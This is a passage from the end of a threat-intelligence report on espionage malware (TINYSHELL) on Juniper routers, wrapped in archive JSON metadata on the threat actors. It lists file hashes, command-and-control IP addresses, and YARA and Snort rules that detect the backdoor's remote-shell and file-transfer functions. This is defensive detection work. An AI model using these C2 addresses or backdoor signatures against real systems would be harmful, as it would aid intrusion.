5995aaff5a047565c0d7fe\r\noemd TINYSHELL e7622d983d22e749b3658600df00296d cf7af504ef0796d91207e41815187a793d430d85 905b18d5df58dd6c16930\r\nto TINYSHELL b9e4784fa0e6283ce6e2094426a02fce 01735bb47a933ae9ec470e6be737d8f646a8ec66 e1de05a2832437ab70d36\r\noemd TINYSHELL bf80c96089d37b8571b5de7cab14dd9f cec327e51b79cf11b3eeffebf1be8ac0d66e9529 3751997cfcb038e6b658e\r\nlmpad TINYSHELL 3243e04afe18cc5e1230d49011e19899 2e9215a203e908483d04dfc0328651d79d35b54f 7ae38a27494dd6c1bc9ab\r\nNetwork Indicators\r\nDescription Indicator\r\nTINYSHELL Command and Control server 129.126.109.50:22\r\nTINYSHELL Command and Control server 116.88.34.184:22\r\nTINYSHELL Command and Control server 223.25.78.136:22\r\nTINYSHELL Command and Control server 45.77.39.28:22\r\nTINYSHELL Command and Control server 101.100.182.122:22\r\nTINYSHELL Command and Control server 118.189.188.122:22\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/\r\nPage 11 of 13\n\nTINYSHELL Command and Control server 158.140.135.244:22\r\nTINYSHELL Command and Control server 8.222.225.8:22\r\nDetection\r\nYARA-L Rules\r\nRelevant rules are available in the Google SecOps Mandiant Intel Emerging Threats curated detections rule set.\r\nSEAELF Installer Execution\r\nGHOSTTOWN Utility Execution\r\nREPTILE Rootkit Command Line Argument Tampering\r\nREPTILE Rootkit Cmd Component Usage\r\nREPTILE Rootkit Shell Component Usage\r\nREPTILE Rootkit Hide Command Usage\r\nYARA Rules\r\nrule M_Hunting_PacketEncryptionLayer_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n strings:\r\n $pel_1 = \"pel_client_init\"\r\n $pel_2 = \"pel_server_init\"\r\n $pel_3 = \"pel_setup_context\"\r\n $pel_4 = \"pel_send_msg\"\r\n $pel_5 = \"pel_recv_msg\"\r\n $pel_6 = \"pel_send_all\"\r\n $pel_7 = \"pel_recv_all\"\r\n $pel_8 = \"pel_errno\"\r\n $pel_9 = \"pel_context\"\r\n $pel_10 = \"pel_ctx\"\r\n $pel_11 = \"send_ctx\"\r\n $pel_12 = \"recv_ctx\"\r\n condition:\r\n 4 of ($pel_*)\r\n}\r\nrule M_Hunting_TINYSHELL_5\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n strings:\r\n $tsh_1 = \"tsh_get_file\"\r\n $tsh_2 = \"tsh_put_file\"\r\n $tsh_3 = \"tsh_runshell\"\r\n $tshd_1 = \"tshd_get_file\"\r\n $tshd_2 = \"tshd_put_file\"\r\n $tshd_3 = \"tshd_runshell\"\r\n condition:\r\n all of ($tshd_*) or all of ($tsh_*)\r\n}\r\nSnort/Suricata Rules\r\nalert udp any any -\u003e any any ( msg:\"M_Backdoor_TINYSHELL_deadbeef_1\";\r\ndsize:\u003e15; content:\"|44 31 3A 14 45 95 6A 73|\"; offset: 0; depth:8;\r\nthreshold:type limit,track by_src,count 1,seconds 3600; sid:1000000; rev:1; )\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/\r\nPage 12 of 13\n\nalert udp any any -\u003e any any ( msg:\"M_Backdoor_TINYSHELL_deadbeef_2\";\r\ndsize:\u003e15; content:\"|64 11 1A 34 65 B5 4A 53|\"; offset: 0; depth:8;\r\nthreshold:type limit,track by_src,count 1,seconds 3600; sid:1000001; rev:1; )\r\nalert icmp any any -\u003e any any ( msg:\"M_Backdoor_TINYSHELL_uSarguuS62bKRA0J\";\r\ncontent:\"|f3 d5 e7 f4 e1 f3 f3 d5 b0 b4 e4 cd d4 c7 b6 cc|\"; threshold:type\r\nlimit,track by_src,count 1,seconds 3600; sid:1000002; rev:1; )\r\nalert udp any any -\u003e any any ( msg:\"M_Backdoor_TINYSHELL_0b3330c0b41d1ae2\";\r\ndsize:\u003e27; content:\"|c5 c4 ec 4d|\"; offset: 0; depth:4; content:\"|a6 04 ed 83\r\n92 46 ce 40 9a 34 8c 7b 5a d6 e5 0d|\"; offset:12; depth:16; threshold:type\r\nlimit,track by_src,count 1,seconds 3600; sid:1000003; rev:1; )\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/" ], "report_names": [ "china-nexus-espionage-targets-juniper-routers" ], "threat_actors": [ { "id": "846522d7-29cb-4a0c-8ebe-ffba7429e2d7", "created_at": "2023-06-23T02:04:34.793629Z", "updated_at": "2026-04-10T02:00:04.971054Z", "deleted_at": null, "main_name": "Volt Typhoon", "aliases": [ "Bronze Silhouette", "Dev-0391", "Insidious Taurus", "Redfly", "Storm-0391", "UAT-5918", "UAT-7237", "UNC3236", "VOLTZITE", "Vanguard Panda" ], "source_name": "ETDA:Volt Typhoon", "tools": [ "FRP", "Fast Reverse Proxy", "Impacket", "LOLBAS", "LOLBins", "Living off the Land" ], "source_id": "ETDA", "reports": null }, { "id": "f0eca237-f191-448f-87d1-5d6b3651cbff", "created_at": "2024-02-06T02:00:04.140087Z", "updated_at": "2026-04-10T02:00:03.577326Z", "deleted_at": null, "main_name": "GhostEmperor", "aliases": [ "OPERATOR PANDA", "FamousSparrow", "UNC2286", "Salt Typhoon", "RedMike" ], "source_name": "MISPGALAXY:GhostEmperor", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9df8987a-27fc-45c5-83b0-20dceb8288af", "created_at": "2025-10-29T02:00:51.836932Z", "updated_at": "2026-04-10T02:00:05.253487Z", "deleted_at": null, "main_name": "UNC3886", "aliases": [ "UNC3886" ], "source_name": "MITRE:UNC3886", "tools": [ "MOPSLED", "VIRTUALPIE", "CASTLETAP", "THINCRUST", "VIRTUALPITA", "RIFLESPINE" ], "source_id": "MITRE", "reports": null }, { "id": "a08d93aa-41e4-4eca-a0fd-002d051a2c2d", "created_at": "2024-08-28T02:02:09.711951Z", "updated_at": "2026-04-10T02:00:04.957678Z", "deleted_at": null, "main_name": "UNC3886", "aliases": [ "Fire Ant" ], "source_name": "ETDA:UNC3886", "tools": [ "BOLDMOVE", "CASTLETAP", "LOOKOVER", "MOPSLED", "RIFLESPINE", "TABLEFLIP", "THINCRUST", "Tiny SHell", "VIRTUALGATE", "VIRTUALPIE", "VIRTUALPITA", "VIRTUALSHINE", "tsh" ], "source_id": "ETDA", "reports": null }, { "id": "1c91699d-77d3-4ad7-9857-9f9196ac1e37", "created_at": "2023-11-04T02:00:07.663664Z", "updated_at": "2026-04-10T02:00:03.385989Z", "deleted_at": null, "main_name": "UNC3886", "aliases": [], "source_name": "MISPGALAXY:UNC3886", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d390d62a-6e11-46e5-a16f-a88898a8e6ff", "created_at": "2024-12-28T02:01:54.899899Z", "updated_at": "2026-04-10T02:00:04.880446Z", "deleted_at": null, "main_name": "Salt Typhoon", "aliases": [ "Earth Estries", "FamousSparrow", "GhostEmperor", "Operator Panda", "RedMike", "Salt Typhoon", "UNC2286" ], "source_name": "ETDA:Salt Typhoon", "tools": [ "Agentemis", "Backdr-NQ", "Cobalt Strike", "CobaltStrike", "Crowdoor", "Cryptmerlin", "Deed RAT", "Demodex", "FamousSparrow", "FuxosDoor", "GHOSTSPIDER", "HemiGate", "MASOL RAT", "Mimikatz", "NBTscan", "NinjaCopy", "ProcDump", "PsExec", "PsList", "SnappyBee", "SparrowDoor", "TrillClient", "WinRAR", "Zingdoor", "certutil", "certutil.exe", "cobeacon", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "a88747e2-ffed-45d8-b847-8464361b2254", "created_at": "2023-11-01T02:01:06.605663Z", "updated_at": "2026-04-10T02:00:05.289908Z", "deleted_at": null, "main_name": "Volt Typhoon", "aliases": [ "Volt Typhoon", "BRONZE SILHOUETTE", "Vanguard Panda", "DEV-0391", "UNC3236", "Voltzite", "Insidious Taurus" ], "source_name": "MITRE:Volt Typhoon", "tools": [ "netsh", "PsExec", "ipconfig", "Wevtutil", "VersaMem", "Tasklist", "Mimikatz", "Impacket", "Systeminfo", "netstat", "Nltest", "certutil", "FRP", "cmd" ], "source_id": "MITRE", "reports": null }, { "id": "49b3063e-a96c-4a43-b28b-1c380ae6a64b", "created_at": "2025-08-07T02:03:24.661509Z", "updated_at": "2026-04-10T02:00:03.644548Z", "deleted_at": null, "main_name": "BRONZE SILHOUETTE", "aliases": [ "Dev-0391 ", "Insidious Taurus ", "UNC3236 ", "Vanguard Panda ", "Volt Typhoon ", "Voltzite " ], "source_name": "Secureworks:BRONZE SILHOUETTE", "tools": [ "Living-off-the-land binaries", "Web shells" ], "source_id": "Secureworks", "reports": null }, { "id": "fcff864b-9255-49cf-9d9b-2b9cb2ad7cff", "created_at": "2025-04-23T02:00:55.190165Z", "updated_at": "2026-04-10T02:00:05.361244Z", "deleted_at": null, "main_name": "Salt Typhoon", "aliases": [ "Salt Typhoon" ], "source_name": "MITRE:Salt Typhoon", "tools": [ "JumbledPath" ], "source_id": "MITRE", "reports": null }, { "id": "6477a057-a76b-4b60-9135-b21ee075ca40", "created_at": "2025-11-01T02:04:53.060656Z", "updated_at": "2026-04-10T02:00:03.845594Z", "deleted_at": null, "main_name": "BRONZE TIGER", "aliases": [ "Earth Estries ", "Famous Sparrow ", "Ghost Emperor ", "RedMike ", "Salt Typhoon " ], "source_name": "Secureworks:BRONZE TIGER", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "4ed2b20c-7523-4852-833b-cebee8029f55", "created_at": "2023-05-26T02:02:03.524749Z", "updated_at": "2026-04-10T02:00:03.366175Z", "deleted_at": null, "main_name": "Volt Typhoon", "aliases": [ "BRONZE SILHOUETTE", "VANGUARD PANDA", "UNC3236", "Insidious Taurus", "VOLTZITE", "Dev-0391", "Storm-0391" ], "source_name": "MISPGALAXY:Volt Typhoon", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434130, "ts_updated_at": 1775826756, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/99fd1cb12fde3916c86c1226af85a5d816145c8d.pdf", "text": "https://archive.orkl.eu/99fd1cb12fde3916c86c1226af85a5d816145c8d.txt", "img": "https://archive.orkl.eu/99fd1cb12fde3916c86c1226af85a5d816145c8d.jpg" } }